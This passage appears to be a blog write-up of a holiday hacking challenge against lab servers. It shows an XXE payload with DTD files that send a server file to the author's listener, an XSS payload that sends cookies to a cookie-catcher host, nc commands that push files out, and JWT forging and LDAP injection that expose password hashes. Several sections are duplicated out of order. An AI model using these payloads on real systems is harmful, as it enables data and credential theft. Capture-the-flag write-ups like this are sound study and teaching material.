alabaster.snowball’s account. I found that I could log into other accounts using the
same method as well, but changing the user account to whatever user I wanted to be. In alabaster.snowball’s account, I found hints to get access to
the EMI server. Namely, Alabaster saying that he would click on any link in any e-mail
containing the words gingerbread, cookie, recipe. Minty Candycane sent Alabaster
Snowball an e-mail asking about DDE Injection, as well as sending a proof of concept
found here: http://mail.northpolechristmastown.com/attachments/
dde_exmaple_minty_candycane.png.
I obtained the BOLO - Munchkin Mole Report.docx, GreatBookPage3.pdf, MEMO - Password Policy Reminder.docx, Naughty and Nice List.csv, Naughty and Nice list.docx.
Mail Server
The nmap scan also revealed a mail server at 10.142.0.5. I tried reading e-mails and sending phishing e-mails by logging via telnet. Then I read the hints and found out that there might be an easier way in. So, I set up ssh forwarding, set my browser to use a proxy, and typed “10.142.0.5/robots.txt” into my browser. I looked at robots.txt and found a file that was disallowed. It was the source code for the cookie: cookie.txt.
Cookie.txt |
The hints for this one were given by: Pepper Minstix. I found a useful resource that lets people test node.js modules in their browser called runkit + npm. I found the aes256 module and played around with it.
var aes256 = require(“aes256” 1.0.2)
var key = ‘santaisonabender’;
var encrypted = ‘AAAAAAAAAAAAAAAAAAAAAA’; var plaintext = ‘’;
console.log(encrypted);
var decrypted = aes256.decrypt(key, encrypted); console.log(decrypted);
if (decrypted === plaintext){
console.log(‘equal’);
}
I found out that the IV is completely dropped by this module. In the program, it’s aes256 encrypted and base64 encoded. So to decrypt, it would be base64 decoded and aes256 decrypted. 22 A’s are required because when 16 characters - the IV are base64 encoded, it’s drawn out to 22 characters. I played with base64 encoding to see what happens to come by that bit of information that 16 characters are padded out to 22.
The hints provided by Pepper Minstix hinted at changing the cookie. The code appeared as though it compared the plaintext variable in the decryption function to the plaintext value in the cookie. The plaintext variable in the decryption function’s value is gotten by passing the key and the ciphertext from the cookie to the decryption algorithm. If the ciphertext is 22 characters, those characters are dropped, leaving it blank. I’m not sure why it’s blank given that the key should still passed to the algorithm, but it worked, so I didn’t really question it. I would guess it’s the way that node.js handles undefined objects, but I’m not sure.
I changed the cookie in my browser, using Developer Tools in Firefox. I left the plaintext blank and put 22 A’s in the cipher text.
Changing the cookie. |
Minty Candycane DDE Example |
I posted those pics earlier, in the section about the Holiday Hack Challenge Questions.
EAAS Server
The nmap scan found this server at 10.142.0.13. The hints for this challenge were provided by Sugar Plum Mary. Again, used ssh port forwarding to pivot to this machine, and changed the proxy in my browser to allow me to see this web page.
Logging onto the eaas server, there is an area to submit requests to build elves using xml.
EAAS Web Site |
Click on the Elf Checking Service to Exploit this web site.
Not always Upload Capability that is vulnerable, but when it is.... |
This particular site is vulnerable to and External XML Entities attack. The attack detailed here works: https://pen-testing.sans.org/blog/ 2017/12/08/entity-inception-exploiting-iis-net-with-xxe-vulnerabilities. Below is the dtd file that I submitted to the eaas server:
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE demo [
<!ELEMENT demo ANY >
<!ENTITY % extentity SYSTEM "http://x.x.x.x:6666/sweets.dtd"> %extentity;
%inception;
%sendit;
]
<
Below is the dtd file that I put on my server that I use to test vulnerabilities with.
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % dataismine SYSTEM "file:///c:/greatbook.txt">
<!ENTITY % inception "<!ENTITY % sendit SYSTEM ‘http://
x.x.x.x:6667/?%dataismine;'>">
Upload DTD XXE Exploit that borrows a file... |
I used the python module SimpleHTTPServer to serve sweets.dtd so I
didn’t have to serve a full website. I made sure I was in a directory
I wasn’t afraid for people to see the files in considering that
SimpleHTTPServer serves the current directory by default.
python -m SimpleHTTPServer 6666Then I had a netcat listener running to catch greatbook.txt nc -nvlp 6667 > greatbook.txt
Serving Sweets on my borrowing Server |
Great Book Page! |
EMI Server
I wasn’t successful obtaining this file. I tried phishing alabaster snow using the hints
detailed above in the Mail Server Section. The hints for this one were given by Shinny
Upatree. For whatever reason, I only got Alabaster Snowball to successfully connect to
me once or twice, and the same payload would not work another time. I tried the proof
of concept that Minty Candycane submitted. I tried turning it around and using the
(New-Object System.Net.WebClient).UploadFile(). I tried running ping and capturing
the traffic on my server to test connectivity. I tried using nc to send the file to myself as
nc x.x.x.x 6666 < C:\\GreatBookPage7.pdf. I tried nc x.x.x.x 6666 <
C:\\GreatBookPage7.pdf thinking I might need to escape the < sign. I tried to offload
the file onto the smb share owned by the elves or one of the other servers owned by the elves since I have access to them. I tried to offload the file to the l2s Server since I could break out of rbash on it. Found out the ip for the l2s server by doing:
/bin/netstat -n.
10.142.0.11
I put the listener in a hidden folder on the l2s server. (That could make things a bit easier for other players, if they found the hidden folder, if I was actually successful. :))
EDB Server
This one was vulnerable to XSS. The hints for this one were given by: Wunorse Openslae. I was having trouble with syntax on this one. The IP for this one was 10.142.0.6. I used ssh forwarding and set up a proxy on my browser. Navigating to 10.142.0.6, you see a login page. If you click on the Support link, you’re presented with a form to help get your login credentials if you’ve forgotten them. The message area is vulnerable to XSS. If you view the source of the page, at the bottom there is javascript that shows how the credential is stored. The credential is stored in local storage as np-auth. If you view the robots.txt page, you will see that the dev page is disallowed. This gives the LDAP information that is needed later to exploit this server.
I used the XSS filter evasion techniques denoted here until I found one that popped an alert box, then changed the payload:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
Here is the XSS that I used:
<IMG SRC=# onerror=window.open(“http://x.x.x.x/cookiecatcher.php? cookie="+document.cookie)>
It just plain looks weird, but I’m not awesome with javascript. I found it after playing around with the syntax a bit.
/bin/netstat -n.
10.142.0.11
I put the listener in a hidden folder on the l2s server. (That could make things a bit easier for other players, if they found the hidden folder, if I was actually successful. :))
EDB Server
This one was vulnerable to XSS. The hints for this one were given by: Wunorse Openslae. I was having trouble with syntax on this one. The IP for this one was 10.142.0.6. I used ssh forwarding and set up a proxy on my browser. Navigating to 10.142.0.6, you see a login page. If you click on the Support link, you’re presented with a form to help get your login credentials if you’ve forgotten them. The message area is vulnerable to XSS. If you view the source of the page, at the bottom there is javascript that shows how the credential is stored. The credential is stored in local storage as np-auth. If you view the robots.txt page, you will see that the dev page is disallowed. This gives the LDAP information that is needed later to exploit this server.
I used the XSS filter evasion techniques denoted here until I found one that popped an alert box, then changed the payload:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
Here is the XSS that I used:
<IMG SRC=# onerror=window.open(“http://x.x.x.x/cookiecatcher.php? cookie="+document.cookie)>
It just plain looks weird, but I’m not awesome with javascript. I found it after playing around with the syntax a bit.
On my server, I had a php program that I found that logs the cookie, found here:
https://breakthesecurity.cysecurity.org/2011/09/how-to-create-cookie-stealer-coding-in- php-get-via-email.html
I served it using the development module in php
sudo php -s 0.0.0.0:80
Then I decoded the np-auth token using py-jwt. I didn’t need a secret to decode it. I tried changing the expiration on that token, but I didn’t have the secret to successfully forging a new token.
I didn’t know that I had to crack the secret until a friend gave me a pointer.
I used jwtcrack to crack it and got the secret “3lv3s”.
I used the secret to forge a token with py-jwt.
I changed the local storage to hold a token named np-auth, with the value of the newly forged key.
I just got into the edb/ldap server the night that the challenge is due, so I didn't finish getting that flag. Hints give away what it is vulnerable to. Also, I knew what the other servers were vulnerable to, and nmap says this is running ldap, hence the reason I know its the ldap one.
If you look at robots.txt, you see that the /dev folder is supposed to be disallowed in the search results. Looking at the dev folder, you see this:
Update: Well, that didn't take long. I'm holding off on reading write-ups until I solve these. It paid off. I returned all the records from reading this post on the SANS Pen Testing blog.
https://pen-testing.sans.org/blog/2017/11/27/understanding-and-exploiting-web-based-ldap
Getting past this was annoying until I figured out what to do.
So basically what happens is the radio button on the web page has to be checked for variable "IsElf" to be true, else "IsElf" is false. If "isElf" from the request form is not equal to true, then isElf is reindeer. If "isElf" form the request form is equal to true, then isElf is elf. These represent the ou in LDAP. So I did this query and it returned Rudolph. I'm wondering how it returned Rudolph. Look about two sentences ago-ifElf is false then ou = reindeer. That is how Rudolph was returned. Duh to me. Then I noticed the scrollbar at the bottom.
So how did everyone else's records return? I honestly have no idea how this worked. I will have to study it more. But, I changed the attributes as described in the article like so:
It returned everyone's password hashes as well. Nice!
Either crack it or try Google because it's an MD5 Hash.
Log out and attempt to log in as Santa Claus...
NPPD Server
We weren’t allowed to attack this one, but we could use it to get more information than was intended.
The people on the naughty and nice list could be compared to the infractions on the database which can then be used to determine how many infractions could be done to be placed on the naughty list. It could potentially be used to see who moles are as well.
https://breakthesecurity.cysecurity.org/2011/09/how-to-create-cookie-stealer-coding-in- php-get-via-email.html
I served it using the development module in php
sudo php -s 0.0.0.0:80
Then I decoded the np-auth token using py-jwt. I didn’t need a secret to decode it. I tried changing the expiration on that token, but I didn’t have the secret to successfully forging a new token.
Alabaster Snowball's JWT Token |
Blank Key |
Alabaster's decoded JWT Token |
I didn’t know that I had to crack the secret until a friend gave me a pointer.
I used jwtcrack to crack it and got the secret “3lv3s”.
Alabaster's Cracked JWT Secret. |
I used the secret to forge a token with py-jwt.
Forged Alabaster's JWT Token. |
I changed the local storage to hold a token named np-auth, with the value of the newly forged key.
Changing Local Storage np-auth |
EDB Server |
I just got into the edb/ldap server the night that the challenge is due, so I didn't finish getting that flag. Hints give away what it is vulnerable to. Also, I knew what the other servers were vulnerable to, and nmap says this is running ldap, hence the reason I know its the ldap one.
If you look at robots.txt, you see that the /dev folder is supposed to be disallowed in the search results. Looking at the dev folder, you see this:
Dev Listing |
LDAP LDIF Template |
https://pen-testing.sans.org/blog/2017/11/27/understanding-and-exploiting-web-based-ldap
Getting past this was annoying until I figured out what to do.
EDB Find Elves Source Code |
Returning Everyone's Records |
Changing HTML to get Password Hashes |
Santa's Password Hash! |
Santa's Cracked Password |
Entering Password for Santa Panel |
Letter From The Wizard! |
NPPD Server
We weren’t allowed to attack this one, but we could use it to get more information than was intended.
The people on the naughty and nice list could be compared to the infractions on the database which can then be used to determine how many infractions could be done to be placed on the naughty list. It could potentially be used to see who moles are as well.
No comments:
Post a Comment